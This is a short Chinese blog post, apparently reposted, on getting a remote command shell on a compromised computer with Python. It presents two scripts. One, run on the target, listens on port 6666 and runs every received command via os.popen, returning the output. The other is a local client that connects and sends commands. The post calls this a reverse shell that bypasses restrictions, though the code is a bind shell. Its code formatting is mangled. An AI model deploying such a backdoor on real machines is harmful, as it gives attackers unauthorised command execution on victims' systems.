有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
from socket import * from os import * s = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议 s.bind(('', 6666 )) #补丁端口 s.listen( 1 ) #开始监听一个队列 while True : sock,addr = s.accept() #返回两次 第一次返回连接地址 二 端口号 print ( '客户端:' ,addr) while True : cmd = sock.recv( 1024 ) #缓存长度 接收传递过来 cmdstr = cmd.decode() if cmdstr = = 'exit' : print ( '客户端:' ,addr, '关闭' ) sock.close() break result = popen(cmdstr).read() sock.send(result.encode()) s.close() |
本机运行
1
2
3
4
5
6
7
8
9
10
11
12
13
|
from socket import * from os import * c = socket(AF_INET,SOCK_STREAM) #IVP4 寻址 tcp协议 c.connect(( '127.0.0.1' , 6666 )) #连接地址 while True : cmd = input ( "cmd:" ) c.send(cmd.encode()) #必须传递流 if cmd = = 'exit' : c.close() break data = c.recv( 1014 ) print (data.decode()) |
总结
以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的!
原文链接:https://www.cnblogs.com/yuanzijian-ruiec/archive/2019/06/25/11081385.html